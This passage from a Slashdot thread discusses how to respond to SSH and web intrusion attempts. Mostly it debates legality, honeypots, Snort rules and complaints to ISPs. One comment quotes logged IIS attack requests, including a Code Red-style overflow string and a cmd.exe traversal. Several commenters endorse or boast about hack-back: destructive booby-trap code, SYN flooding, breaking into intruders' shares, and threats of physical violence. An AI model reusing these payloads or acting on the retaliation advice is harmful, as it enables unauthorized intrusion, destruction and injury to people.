      If I was 12 and got caught doing something dumb like trying to log in as root like that, I'd just counter with the defense that I got the IP address wrong. "Oh, that waas your server? My buddies must have been playing a joke on me...he said that was his machine." I'd most likely get off, and walk away with a feeling that I was untouchable on the net.

      Prior to being arrested of course, your computer systems will be seized as evidence, and if the search warrant does turn up all sorts of computer hacking related material on your system, you can be convicted of conspiracy (which is often worse than attempt).

      And the pain of losing your computer systems for 12 months or so while the case is in court is quite a sever punishment in and of itself, even if you manage to weasle your way out of it. And certainly is more of a punishment than not being arrested at all.

      Dont forget the possible bail conditions which may be imposed while trial is pending.

      Cops letting minor criminals off in the hopes of nailing them for something bigger is unjust and a conflict of interest, and abuse of process. It gives the public the impression that cops actually WANT people to commit serious crimes.

      The correct attitude for a cop is : I sure hope that fellow does NOT commit a more serious crime.
      IMHO. I would hate to think cops watched crimes in progress and harboured the hope that more serious crimes would follow.

      Such police conduct also defeats the intentions of lawmakers who put those minor crimes on the books.

      Cops should do their job, and enforce the law. All laws. Without favoratism. If there is not enough resources to do the job, then lawmakers should allocate more. It should not be the police who unilaterally decide to stop prosecuting minor crimes to save money.

      I think it would be better to get minor criminals while they are just minor

      --
      No one has a right to their *own* opinion. They have a right to the TRUTH.
    73. Re:Very Easy by Goobermunch · · Score: 1

      Generally, attempt is treated as a crime of the same degree or slightly lower degree. The idea is that criminals shouldn't be punished less just because they didn't succeed. Thus, if Criminal Trespass of an Automobile is a Class 5 (or E) felony, Attempted Criminal Trespass will probably be a Class 5 (E) or 6 (F) Felony.

      The size of the punishment for attempt is usually proportionate to the penalty for the complete offense. Thus, if the laws in America were so draconian to impose a year of jail for computer related crimes, the attempt might well result in 6 months in the Federal Penitentiary. For a 16 year old kid who's not entirely comfortable with who he is, that can be a truly intimidating prospect. (Hell, for a 30 year old man who knows who he is it can be damn frightening).

      --AC

    74. Re:Very Easy by Pavel42 · · Score: 1

      By that logic, it's okay to try someone's front door just because there's a Christmas tree advertising presents inside. Same for a bungled bank robbery. In both cases, it's attempted theft, and the test of criminal intent is not whether the attempt succeeds or fails.

    75. Re:Very Easy by SpaceJunkie · · Score: 1

      Put a faked session on the port and service they are logging on. Give them "access" to "top secret new code" - of the evil obfuscated kind, which when downloaded and they attempt to compile and run, destroys their box - I mean stuff like attempting to flash their hardware BIOS chips (GFx, sound, HDD, CD/DvD R/RW, Motherboard..) with crap destroy then format their HDD. Stick a big warning on the way in that anti-intrusion measures are in place.

      If people can use razor-wire with big warnings, I dont see how this is any different. Make the password for this fake "session" fairly secure, and keep times between allowable attempts as long as 2 minutes to keep their bandwidth/cpu usage low. If they actually get into the fake session - they got what was coming to them....

      --
      OrionRobots.co.uk - Robots From sol
    76. Re:Very Easy by Alsee · · Score: 1

      There is a gaping logic hole in the details of your story.

      Either:
      (1) The parking lot was over a half mile wide, or
      (2) the person making the report had a walkie talkie direct to the police car parked 100 feet away, or
      (3) you spent more time than just walking across the lot, either standing around or doing something else.

      That said, and presuming you weren't going into the cars or running across the hoods or somesuch, the person making the call sounds like an idiot not only harrasing you, but harrassing the police with nonsense calls.

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
    77. Re:Very Easy by blooba · · Score: 1

      Just goes to show you: No good deed goes unpunished.

    78. Re:Very Easy by Positive+Charge · · Score: 1

      Lots of people know what I'm doing and I feel totally invulnerable each and every time I go take a leak.

    79. Re:Very Easy by scifiber_phil · · Score: 1

      A twelve year old acting in an anti-social manner needs to be told that his behavior is unacceptable. Allowing bad behavior to continue only sends a message that it's okey. Warning the kid sends the correct message, pull the lion's tail, and you'll get bit.

    80. Re:Very Easy by Anonymous Coward · · Score: 0

      Thanks for that behavior, btw.

      Need more people to act that way.

    81. Re:Very Easy by Anonymous Coward · · Score: 0

      The Spelling Avenger strikes again!
      Little known to others, I also do grammar...
      BEAR in mind. As in carry a load. Up up, and away!

    82. Re:Very Easy by scifiber_phil · · Score: 1

      I can identify. I've actually done this with a car that looked like mine.

    83. Re:Very Easy by ongeboren · · Score: 0

      uhh.. is this a windows or a unix-like box?
      the author speaks about a "root" account, but he mentiones a "tracert" tool, not traceroute..

      also what's the importance of a traceroute? i don't care what routers stay on my way to the intruders. i care what are the results of the ripe whois and how to contact their isp, what country they are from etc.

      --
      First I wanted to be a chef. Then I wanted to be Napoleon. My ambitions have continued to grow ever since.
    84. Re:Very Easy by gargan · · Score: 1

      ruining his pr0n folder?! now you've gone too far man!

      --
      Emory: Uh..we're still..beta testing that.
      Oglethorpe: What you're testing is me and my patience!
    85. Re:Very Easy by Anonymous Coward · · Score: 0

      20$ says the person telling this story has a middle name that rhymes with Herman, and he's telling the story accurately. He leaves out that a cop car pulled my overloaded Fiero over about 1/2 a mile away and questioned us in a moderately friendly manner.

      We weren't playing games with the cars, just walking back in the short way, and you're right: police weren't the bad guys, the overly paranoid citizen was. Ahhh Edmond.

      All assuming this is _my_ story RovingSlug is telling of course.

    86. Re:Very Easy by ishmaelflood · · Score: 1

      Do you try people's front doors as well? How about the cash drawer on a cash register? Might not be locked!

      If you had found one that was unlocked what would you have done?

    87. Re:Very Easy by Anonymous Coward · · Score: 0

      don't bother, all those "script kiddies" are just the govt's cover for echealeon. and now since that will come up at a key word its probobly keeping track of me.

      -2 conspiracy theory

    88. Re:Very Easy by Anonymous Coward · · Score: 0

      No, it's more like having your car parked with a FOR SALE sign in the window. And then some stupid fucking cunt shit for brains assfuck think that means he can see if the suspension has any problems by dropping a twelve ton block of concrete on your roof. And another immature salad-tossing pee hole wants to see how well the car rates in side impacts so he runs into it with a bull dozer.

      I put up my webserver to serve content, and I have no problem with someone connecting to my server and making a request like this:

      GET / HTTP/1.0

      But when they start with shit like this:

      CONNECT 1.3.3.7:1337 HTTP/1.0
      POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
      GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0
      GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+ dir

      Then the stupid penis wrinkles have gone beyond the intended use of my server and bandwidth and if I can track them down I will. The best times are when it's some dumb fuck from my ISP, because I can track them down physically. I hope the shithead felt he got a good deal, send an intrustion attempt to my webserver, wake up in the morning with all your car windows busted out and your break lines sawn through. Or the other little piss ant goth boy, hope he enjoyed me tearing out his lip ring. Stupid fuckers.

    89. Re:Very Easy by Anonymous Coward · · Score: 0

      Only in extenuating circumstances can your juvenile record be opened. It would additionally require a judge to examine the record and determine if there is relevant information and also that the prosecutors have a good argument that indicates that your juvie record is relevant and applies.

    90. Re:Very Easy by Anonymous Coward · · Score: 0

      Don't log in and fix it. Log in and replace every user document with a file of the same name but a message like this:

      "You used to have something here. Now you don't. Apply security patches. Tomorrow I'm coming back and flashing your BIOS to crap. Apply security patches or you'll have to buy new hardware in addition to losing all your data. Have a nice day you irresponsible fuck hole."

    91. Re:Very Easy by Anonymous Coward · · Score: 0
      "Want in one hand and spit in the other and see which one fills up first." - My Dad


      Here, it's "Want in one hand and shit in the other, and see which one fills up first"
    92. Re:Very Easy by Anonymous Coward · · Score: 0

      they can also arrest you, and drop the charges. proves a damn good point, but leaves you with only a police record, not a criminal

      Worked for me

    93. Re:Very Easy by essreenim · · Score: 1

      Thankyou spelling Avenger,
      Now fly off to your next grammar crime...!

    94. Re:Very Easy by davidsyes · · Score: 1

      "If I was 12 and got caught doing something dumb like trying to log in as root like that, I'd just counter with the defense that I got the IP address wrong. "Oh, that waas your server? My buddies must have been playing a joke on me...he said that was his machine.""

      But, for that to survive the plausibility (or plausible denial) test, you'd better have a REAL friend whose address is close enough to pass the crossed-fingers test.

      ------

      "To run with the analogy, if a cop sees a kid going down a row of cars testing door handles, he won't just run out and arrest him. The cop will wait until the kid comes across an unlocked door, rummages through the car, and takes something. Then the cop will arrest him. The cop waits because until the kid takes something, it's not a clear cut case."

      Some (but not all) cops might see a kid keying a series of car doors, but still watch them, waiting to see if they are going to steal anything or escalate to breaking windows or slashing tires. So, what is worse: Observing for a clear violation, or letting the perp do more damage to cinch an air-tight case?

      David Syes

      --
      Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
    95. Re:Very Easy by mustangsal66 · · Score: 1
      ISPs that take a few basic precautions sit back and laugh as their competitors get ravaged by the worm of the week, while zombied windows boxes spam everyone and get the whole ISP blackholed, etc.


      We do simple things like block outbound SMTP except to our servers which require authentication.

      You pay one person to keep up on the script-kiddy tools and you block the ports they tend to use, or program your router to drop certain scanning packets, making it look like the computers you host are immune to the bug. Trivial stuff really.


      Sure and that increases the cost / subscriber therefore increasing the cost to the consumer.

      While I agree that these things need to be contained/delt with. That doesn't stop the fact that ISP's need to make money to stay in business. If the CEOs have to make a choice between loosing a customer or polluting the interenet... the customer's will be allowed. We have implimented solutions that look for 'virus/worm/spam' traffic, and redirect http requests to a site that tells them they're infected, but that's not 100% accurate.
      --
      Why worry? Each of us is wearing an unlicensed "nucular" accelerator on his back.
      Sig changed for readability by G.W.
    96. Re:Very Easy by WNight · · Score: 1

      The problem though is that many companies don't see that while a security person costs money, they'll save more by being proactive. If you pay for bandwidth (likely part of your pricing structure) you'll find the drop from eliminating spam and worms to be well worth while. If you provide tech support you can save costly calls.

      What annoying is when the knee-jerk response of "keep the customer" overwhelms any discussion of the value of the customer. Management wanted to give this spammer a ton of chances because he kept coming up with some sad story, despite the ton of bandwidth he burned and the blackhole threats we got because of him.

      If everything came off of the same budget sheet and all you had to do to justify expenses was to show the corresponding loss you'd remove, this would be trivial. Instead they'll pay you a day's wages to do trivial stuff instead of expensing a $20 kinkos visit, yet refuse to allow you to budget some time for security.

    97. Re:Very Easy by Anonymous Coward · · Score: 0

      You were really lucky. With some police deapartments you would have been jumped and thrown to the ground the instant you touched the door handle. No amount of explaining would have made them quit.

      Nowadays, I take the attitude that I'm looking out for me and if somebody needs help, that's what the police and fire departments are for. I'm just NOT willing to take the risk.

    98. Re:Very Easy by chadjg · · Score: 1

      In one town where I used to live there was a law to cover just this kind of situation. They didn't call in B&E, I think it was called "prowling." You could get minorly busted just for looking in car windows and trying the locks.

      In Florida it means

      The State must prove two elements to sustain a conviction for loitering and prowling. First the accused must be loitering and prowling in a manner not usual for law abiding citizens; and, second, the loitering and prowling must be under circumstances that warrant a justifiable and reasonable alarm or concern for the safety of persons or property located in the vicinity. As to the first element the State must prove more than vaguely suspicious presence. As to the second, it must prove conduct that is alarming in nature, indicating an imminent breach of the peace or a threat to public safety.
      Findlawis our friend.

      The lawyers have already covered this base, and it belongs to them. Sorry trolls, beat you to it.

      --
      Why do I have this? I don't smoke.
    99. Re:Very Easy by mustangsal66 · · Score: 1

      ok there's a difference between security scanning each customer, and blocking outbound spam and viral traffic. Blocking bad stuff is easy, and we do it. Implimenting the "Scan each host before allowing them online" i what I was commenting about.

      It's easier and cheaper to silently block bad stuff, then to spend the man hours dealing with the customers issues.

      Yeah in a perfect world, we could teach each customer how to be secure the first time we speak with them. The problems is customers don't care... It's the "Yeah Yeah, just fix it" attitude.

      I agree the internet would be a better place if all this was financially possible.

      We pay for bandwidth just like everyone else, but in full pipe pricing(We pay the same if we flow 5 Mb or 45 Mb through each DS3).

      A spammer on our network may clog our LAN for a few minutes, but it doesn't get out onto the internet.

      --
      Why worry? Each of us is wearing an unlicensed "nucular" accelerator on his back.
      Sig changed for readability by G.W.
    100. Re:Very Easy by WNight · · Score: 1

      My point is that some of it is financially possible, but it sounds too hard and management nixes it because it's on System Admin's budget but would save money for Tech Support, etc.

      My experience in companies is that each little department is willing to torpedo the whole in order to look better personally. IMHO, companies tend to lack a broad view of the whole lifecycle of the product/service.

    101. Re:Very Easy by ggy · · Score: 1
      If I was 12 and got caught doing something dumb like trying to log in as root like that, I'd just counter with the defense that I got the IP address wrong. "Oh, that waas your server? My buddies must have been playing a joke on me...he said that was his machine."
      Actually, this happens a few times a month for me. My home connection uses DHCP to distribute addresses for subscribers, and as one of my home boxes constantly drops its DNS record, I usually scan the subnet and tries to login to every host that responds to 22. I wonder if this'll get me into trouble some day?
  12. Letter by Pinkfud · · Score: 2, Funny

    Write in sloppy block letters: Ve know who you are. Do it vun more time und ve get NASTY!

    --
    The world is my oyster. That's why it's always in a stew.
  13. Maybe set up a honeypot for a bit by Mal-2 · · Score: 5, Insightful

    If you give them a more attractive target for a while, you may find there really aren't all that many attackers left to go after the systems that matter. Not only that, but it would be considerably easier to set up such a system to log their attack techniques, since it isn't actually doing anything. Finally, if they do break through, who cares? Just re-image the drive and let them start over. If they manage to repeat it, you now have a known weakness you can correct.

    Mal-2

    --
    How is the Riemann zeta function like Trump rallies? Both have an endless number of trivial zeros.
    1. Re:Maybe set up a honeypot for a bit by meportez · · Score: 1

      If they get through ONCE you've got a weakness to correct.

    2. Re:Maybe set up a honeypot for a bit by mstefanus · · Score: 0

      Yes yes... that would be a good idea. Get Knoppix, run it on an old PC or something, route port 22 to that machine and enable ssh. Don't forget to set root password "root", you wouldn't want to make it too difficult, would you? ;-) Imagine the attacker's face, when he/she found out everything is on a CD! As for your real SSH, maybe you want to give portknocking try.

    3. Re:Maybe set up a honeypot for a bit by kistral · · Score: 1

      Reimage the drive? Excuse me? Isn't the whole point of a honeypot to study how they got in? For that matter, the first thing you do after any breach of security is shut everything down and don't change ANYTHING on the drive so you can pick up the pieces.

    4. Re:Maybe set up a honeypot for a bit by Anonymous Coward · · Score: 2, Informative

      Honeypots should not be taken lightly. They are a legal hazard. You knowingly operate a vulnerable machine which is connected to the Internet. If the damage isn't restricted to your own systems, you're partially responsible and probably liable for other people's damages.

    5. Re:Maybe set up a honeypot for a bit by Anonymous Coward · · Score: 0

      same as those who try to blame 9/11 on the Dems or the Republicans...I suggest we blame the intruders...

    6. Re:Maybe set up a honeypot for a bit by Anonymous Coward · · Score: 0

      Imagine your surprise when the attacker installs the kernel rootkit in memory and doesn't care that the kernel was once loaded from wherever. All the better, since there is no harddisk, there won't be any evidence once the hacker decides to reboot the machine.

    7. Re:Maybe set up a honeypot for a bit by Anonymous Coward · · Score: 0

      We also blame the people who, through gross negligence, provide the infrastructure which the intruders use to hide their attacks. Knowingly operating a vulnerable system on the internet with the purpose of attracting intruders is grossly negligent, unless you make sure they can't use it as a hop in further intrusions.

    8. Re:Maybe set up a honeypot for a bit by scharkalvin · · Score: 1

      Actually a honey pot should be constructed
      as a 'venus fly trap', or 'roach motel'.
      Crackers break in, but the DON'T break out!

  14. I agree by Anonymous Coward · · Score: 1, Informative

    I have also been seeing these kinds of "attacks" the last few weeks on a server which I admin. Usually attemts to login via ssh to well-known accounts (such as root).

    The site is not a high-profile site by any means but rather a home for some personal projects. I just wrote it of as the script-kiddy attemt de jour but it's interesting to see that others experience the same thing.

    1. Re:I agree by October_30th · · Score: 1
      It's some sort of a spider looking for weak ssh accounts.

      Check out the SecurityFocus Incidents-mailing list for details.

      --
      The owls are not what they seem
  15. ask your company lawyer by Anonymous Coward · · Score: 1, Informative

    you deal with the firewalls,
    let your lawyers deal with crap like this

  16. My Advice by momogasuki · · Score: 3, Informative

    Just ignore them. Focus on keeping your server software up to date and staying informed of possible security issues instead of waisting time trying to track down instrusion attempts.

  17. Snort + Guardian by UltiSkeeter · · Score: 4, Informative

    These two will detect most automatic attempts and then add the IP's to a drop list on your Linux firewall. www.snort.org. Guardian is listed under 'other tools'

    1. Re:Snort + Guardian by Anonymous Coward · · Score: 2, Informative

      Automated addition to a firewall leads to a DOS vulnerability.

    2. Re:Snort + Guardian by Umrick · · Score: 3, Interesting

      We ran this configuration for about 3 months. The problem is the shear number of false positives by the default snort rules. If you can't spend the time trimming down the ruleset to bare minimum to cover your needs, you will be locking out end users.

      Classic for us was one user who had multiple domains with us got blocked every time she went to view one of her pages. Turns out the snort rule was so generic it was just looking for /calendar, so anything containing that would get trashed.

      In the general sense, most likely you won't get a whole lot of cooperation from the ISP (gone are the days of the minions at Erol's). Stay patched, use common sense, and ignore it.

    3. Re:Snort + Guardian by Anonymous Coward · · Score: 0

      The grammar avenger strikes again!
      sheer. Shears are something you use to cut with. Sheer means thin, sharp, or abrupt and imposing.

    4. Re:Snort + Guardian by davidsyes · · Score: 1

      WHEW, and I was thinking scheer, heheh:

      http://www.google.com/search?hl=en&lr=&ie=UTF-8& q= scheer+nazi&btnG=Search

      I guess too much "Rat Patrol" or "A Bridge Too Far", (but not "Abridge too far", heheh).

      "Our Leggs, fit your legs -- they HELLLP you they HOLLLD you. They NEH-VUHR let chyooo goh!"

      (And, too DAMNED much madison avenue (lower-casing/deprecation intentional)

      David Syes

      --
      Previously: "Linux... Toward the Sunrise..." Now: "Linux... Toward the-- No, now, part of Every Sunrise"
  18. Not a cease-n-desist gnome... by AngstAndGuitar · · Score: 5, Funny

    You might consider sending a handwiten letter and use your own name, that would seem a bit more human. Also, most large companies will send polite-but-firm letters, so just threaten bodily harm to them and their pets, that should sound pretty un-corporate. I suppose only the first sugesstion is really a good one, but I like the second one more, so I'm not going to remove it from my comment.

    --
    Less look fast, more go fast.
    1. Re:Not a cease-n-desist gnome... by raam · · Score: 2, Funny


      Dear Blankety-blank:

      Hi. I'm real, real sorry to take your time. I mean, if you don't have time, I understand, and, after all, I don't want to sound like a corporate gnome ]:-) :))). I know you're a real nice hacker, not one of those Russion mob nut-jobs...ah, oops, didn't mean to call names! Anyway, I was just wondering if, if it's not too much trouble, if you could not hack me. I understand that you are a person and have needs, but, and if this bothers you and I sound like a gnome, just let me know(! :) :O :>>), I was wondering if you would help a brother out. Thanks, and if this offends you in any way, please send it back to me and, as you can, guess, I will certainly roll it up and put where any spineless dork might. Thank you so much. Thank you, thank you. You are too kind. Thank you.

      Sincerely,

      D.U. Fus, the Administrator
      Tepid Water Suppositories, inc.

    2. Re:Not a cease-n-desist gnome... by Anonymous Coward · · Score: 0

      Love it! Especially the smileys.

  19. Corporate Gnome by Destructo-Bot · · Score: 2, Interesting
    If there are indeed blatant attempts to gain access to your network and server, then a simple letter or email to their ISP should do the trick and help show your boss that you were trying to be proactive. Keep in mind that those IP's could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major isp's.

    Best chance for a response is to keep it polite and request a notification of what action (if any) they will take. Don't fill your letter or email full of legalese and vauge threats and I'm sure most of the people in charge of a particular abuse department will take you seriously enough. Whether or not they have the clout to take action on your behalf is another matter entirely however.

    Another thing to do is to just keep yourself patched, firewalled, and a close eye on your network. If the attempts are rising, someone thinks your network/servers is/are an easy target. Prove them wrong and perhaps you won't need to write that letter after all.

    Good luck.

    1. Re:Corporate Gnome by ssbljk · · Score: 2, Informative

      Keep in mind that those IP's could be spoofed however, so without something a little more substantial than an IP addy, you are likely to be ignored by most major isp's.

      well, if you decide to write to ISP, don't write letter in which you accusing but ask ISP for help to investigate and be polite.

      --
      /ss
    2. Re:Corporate Gnome by JWSmythe · · Score: 4, Interesting


      No shit.. :)

      I've received some really nasty Emails over the years from winners who just installed some firewall on their home machine, and wonder why we're sending packets to him from our port 80 to some high port on his machine. They're all demanding that we stop or they'll sue, blah, blah, blah.

      I write a real friendly note back saying "sir, you were visiting a porn site at http://example.com. from which you detected the data coming back to you exactly as you requested. yada, yada, yada"

      Once in a while our provider will get a new person in their abuse department, and forward those over. I kindly remind them to go back to their supervisor and ask them exactly what this traffic would mean. Then I write them a friendly letter explaining the basics of the Internet. :)

      They are generally good about sending us only real problems, which are usually about sublet IP blocks. I either pass it on to their sales rep, or call them myself. Most customers I've delt with are very friendly about it.

      We did have a federal agent show up in our office one day, about a hacking attempt from one of our networks (a sublet line). I called the sales rep, got the customer on the line, and they were already aware of it. It was an old unpatched machine, that they had taken offline a few days prior because they had already found it was broken into. They were still examining it, and offered to hold onto the drive for the investivator. I really like good customers.

      --
      Serious? Seriousness is well above my pay grade.
  20. if you do, be careful what you assume by jcomeau_ictx · · Score: 1

    Remember that there are a lot of automated tools, worms, and virii that turn home computers into "zombie" boxes under remote control. If you do decide to send out anything, it's probably best to assume the apparent source of the problem may be masking the real source.

    1. Re:if you do, be careful what you assume by Jedi+Alec · · Score: 1

      all the more reason to send a mail. however, instead of blatantly accusing someone, just suggest that perhaps a not-so-friendly individual has gained access to that and that machine and is attempting to use it for illegal activities. if the box belongs to the person trying to do whatever is going on, that person might be tempted to go and look elsewhere, if it's a compromised box, well, maybe 1 unpatched windows user will find the time and effort to install a firewall...

      --

      People replying to my sig annoy me. That's why I change it all the time.
    2. Re:if you do, be careful what you assume by jaavaaguru · · Score: 1

      The "problem" is people who's computers are left vulnerable, and subsequently given a little exercise by some bad people. If everyone either used a system with relatively few flaws, or just kept up-to-date with patches, the hackers would struggle to do what they currently do. Perhaps even blame it on the vendors who don't have good enough (read: on by default, simple to use, never goes wrong, and if it does, corrects itself) automatic update utilities.

  21. Well... by MrWorf · · Score: 5, Informative

    I always write a really "nice" letter to the ISP of the intruder, where I explain the problem, and that it is causing my customers trouble and that it eats up valuable bandwidth. I ask them to take action, and if not, that I'll have to proceed further (never been needed once). I send the email from the admin account, sign it with my name + admin at my system and then I attach the logs pertaining the intrusion attempt.

    So far, all of these "cease and desist" letters has resulted in action on the ISPs part, and in 50% of the cases, their admins write me back and give me feedback on the problem.

    Ofcourse, I don't do this for every attempt (all depending on my mood ... atleast nowadays), mostly for the more serious attempts (doing multiple attempts, different attempts, etc).

    The worst (or craziest?) attempt yet was by some nut who portscanned the system, port by port from start to finish. I actaully managed to get hold of the owner of the computer system that was scanning me and phoned him. Quite a hilarious experience. Needless to say, the portscanning stopped :)

    1. Re:Well... by zoom · · Score: 4, Informative

      I've had similar experiences. I've noticed several SSH attempts on my server recently - just a personal server at home. I've written to the abuse addresses found by running WHOIS and politely informed the ISP that there was an intrusion attempt and could they please inform the user that we are not a public service.
      Many times the ISP has responded and usually their customer has a zombie box.
      Always include a log if possible so they know the time and the IP-address. Remember to tell them what timezone the timestamps are from.
      WHOIS links
      http://ws.arin.net/cgi-bin/whois.pl
      http:/ /www.ripe.net/db/whois/whois.html
      http://www.apni c.net/apnic-bin/whois.pl

    2. Re:Well... by Anonymous Coward · · Score: 0

      Once upon a time way back in 1995 (or was it 1994?) when I was a young and foolish uni student, I received my first piece of spam. I was well pissed off and proceeded to syn flood the web site it advertised. Then I realised that that sort of behaviour could get me kicked out of uni and so proceeded to quickly delete the source code i'd written and change terminals :)

      Then, more recently, someone was doing the same thing as your portscanner. I connected to the offending PC, put shortcuts labelled 'stop portscanning me' on their desktop, and then started printing out pages in large print to that effect. It occured to me afterwards that the user probably wasn't doing it deliberately but had been owned by a script kiddie.

      Your way is better though, if not as entertaining.

      Even more recently, someone rebooted the cisco router at work by trying to use bad PORT commands on an ftp connection (bug in cisco). I did some digging and started composing a letter to the isp to report the activity. I was minutes away from hitting send when I realised that the culprit was me, the night before, when I hadn't loaded the ip_nat_ftp module under linux. I nearly caused the disconnection of my own home account :)

    3. Re:Well... by Anonymous Coward · · Score: 0

      After getting fed-up with intruders, I wrote to a few ISP's with the dns whois details. None replied so I wrote a script that takes the ip address and tries to smb mount the C$, D$, E$ or F$ drives. You'd be suprised how many intruders leave their back doors open. It's rather fun to leave little notes or start-up scripts saying "Please don't try to crack me again or I'll be back. Love, Arni"

    4. Re:Well... by B2382F29 · · Score: 2, Insightful

      The worst (or craziest?) attempt yet was by some nut who portscanned the system, port by port from start to finish.

      And what's the problem? That is COMPLETELY LEGAL. If you create problems for that other guy, maybe if his connection gets cut off from his ISP because of your complaint, YOU are responsible for the damage (false accusation). Seems you are one of those types going crazy about some other computer sending from port 80 to a high port on your computer.....

      --
      Move Sig. For great justice.
    5. Re:Well... by Anonymous Coward · · Score: 0

      Actually many isps (here in Europe anyway) doesnt allow portscanning in their AUP, so informing the ISP that this person is bugging your box isnt bad...

      What is an accecptable use for a full portscan anyway?

    6. Re:Well... by B2382F29 · · Score: 1

      What is an accecptable use for a full portscan anyway?

      For example, our mailserver at local university has SMTP-AUTH (for relay from outside the university network) only on port 27. Try finding that without portscanning

      BTW, apart from traffic (which is minimal), what problems do you have with portscanning? You don't sue everyone for looking around your house. "Yes, officer, he was looking at my house, looking at the complete wall from left to right."

      And get a new provider which isn't that braindead. "Scanning ports is TEH HAX0R!!11!"

      --
      Move Sig. For great justice.
    7. Re:Well... by glesga_kiss · · Score: 1
      You don't sue everyone for looking around your house. "Yes, officer, he was looking at my house, looking at the complete wall from left to right."

      Better analogy would be if they were seeing if your doors or windows were open. And that would not be acceptible, even if it were legal in your country or not.

    8. Re:Well... by aaronl · · Score: 1

      No, your house isn't connected to an open peer to peer network. It would be more like someone driving around town writing down if there was a house at each lot. The assumption on the Internet is that every machine might be sharing something. If you don't like the possibility of someone connecting to your machine, don't have a routable address!

      I don't like people port scanning me either, but it's because it's usually a precursor to an attack, not because it's illegal or similar.

    9. Re:Well... by Anonymous Coward · · Score: 1, Informative

      Whois is a protocol, you know?
      These are some of the servers speaking it:
      whois.arin.net
      whois.ripe.net
      whois.apnic.n et
      whois.lacnic.net

      If you have to use a webinterface, you might as well use one that doesn't give you the runaround:
      http://www.iks-jena.de/cgi-bin/whois

    10. Re:Well... by Idarubicin · · Score: 1
      And what's the problem? That is COMPLETELY LEGAL. If you create problems for that other guy, maybe if his connection gets cut off from his ISP because of your complaint, YOU are responsible for the damage (false accusation)

      Well, no.

      If you report factual information only, you're in the clear. "There is someone who was connected through your ISP at IP address x.x.x.x at time xx:xx:xx who ran a full port scan on my system. It was kind of annoying. The full logs are attached. He didn't attempt to root our boxen, but could you keep an eye on this user, since this is unusual behaviour..."

      The guy who was port scanning was doing it on the so-called public internet, using the resources of his ISP and the private server--and likely in contravention of most modern AUPs, too. The scanner therefore can't reasonably expect his actions to be confidential, at least with respect to informing the parties involved. Note that the statement outlined above contains no accusation of criminal behaviour, and only states that the actions are unusual--which is true: most users don't do full port scans of other people's servers. Consequently, the person making the report is protected from any sort of libel action.

      Besides, if--as is quite likely, these days--the port scanning attempt came from a zombie, then the ISP and the rooted user probably do want to know about it.

      --
      ~Idarubicin
    11. Re:Well... by Lumpy · · Score: 1

      I work for a large cable company. about 2 years ago someone defaced the newly set up LUG website for my home town that I was maintaining. (The CoLo facility will not allow sftp only ftp) so this nimrod sniffed a password and went and tried to deface the site, he knew nothing about php so all he did was kill it.

      well, I work for the company he get's his broadband from. so from the IP address and time/date stamp on the server's ftp logs. I got his name, address and phone number.

      Showing up on his doorstep asking for his mother and explaining loudly to her how he committed a federal crime and that I can have him in federal prison as well as have the company come down on him and her solved the problem... an 18 year old script kiddie actually pissed his pants there in his own living room.

      needless to say, I never had a problem with him, but did offer to teach him ethical system administration and security if he joined the LUG group.

      It's great when you dont have to go through hoopsto get the personal information and you can deal with it yourself.

      --
      Do not look at laser with remaining good eye.
    12. Re:Well... by B2382F29 · · Score: 1

      Better analogy would be if they were seeing if your doors or windows were open.

      Wrong! That would be the case if you actually initiated a connection (trying anonymous for ftp maybe). Portscanning is only to look IF there is a door/window.

      --
      Move Sig. For great justice.
    13. Re:Well... by Anonymous Coward · · Score: 0

      For example, our mailserver at local university has SMTP-AUTH (for relay from outside the university network) only on port 27. Try finding that without portscanning

      How about informaing your users that port 27 is the one to use? For that matter, how many USERS know wtf a port scan is?

      I hate dipshit h4x0r apologists..

    14. Re:Well... by B3ryllium · · Score: 1

      Uhm ... didn't you just confess to a federal crime?

    15. Re:Well... by Anonymous Coward · · Score: 0

      nope. nothing on the internet is "private information" no matter what you think.

      Hell people can read your email without legal recourse.

      repeat after me "NOTHNIG ON THE INTERNET IS PRIVATE" someone connecting your IP address to who you are as the parent post said is 100% legal if you can access the information (I.E. no you cant break into your ISP's database to get the info, and they do not have to give it to you.)

      I find it funny that people like you think that you have a federally protected RIGHT to hide on the internet.

  22. Politeness is key by The+Cyberwolfe · · Score: 1

    If the attacks are just random script kiddies trying things that will never work, I'd probably ignore it.

    If you're starting to see a pattern or an increase in the sophistication of the attack, though, you might want to just send their ISP a polite letter letting them know what you have found and your concerns. After all, what would you want to see if you were the ISP's sysadmin?

    --
    Ahh, I see you've decided to go psycho. Godspeed.
  23. In my experience by Howzer · · Score: 3, Informative
    In my admittedly limited experience, having been a "web manager" for half a dozen websites or so in my time, this sort of stuff was seasonal (highs in summer and winter when the script kiddies were indoors) and never used to particularly bother me.

    I had confidence in my setup, and no server I had control over was, to my knowledge, ever compromised.

    We never had any sensitive data outside the firewall, anyway.

    On two occasions it got serious (if an easily beaten DOS attack can be called serious) and even then it was only for 20 minutes or so. Our ISP (being a large telecom) was champing at the bit to go after people we had even a small scrap of evidence against, so on those two occasions we simply handed what information we'd gleaned to them, and they let out the dogs.

    At some stage, you've got to stop worrying and learn how to love the internet!

  24. Yes, there are several good ways. by arcade · · Score: 5, Informative

    Personally I tend to ignore the scans for ssh and so forth, as they're just SYN-packets and doesn't consume too much of my resources. Call me a lazy/non-caring bastard. However, it would surely be nice to send off a message to the ISP, as the machines the scans are originating from are probably cracked too.

    I tend to report viruses. I grep my logs daily for viruses from various norwegian ISPs, to the mailserver I admin for my company. During the last five months I've sent daily virus reports to the largest ISP in norway, and they tend to reply within one business day - having notified their customer about the infection. If the customer gets several 'heads up' messages from the ISP without removing the virus, they get their port 25 access filtered until they've confirmed that they've removed the virus.

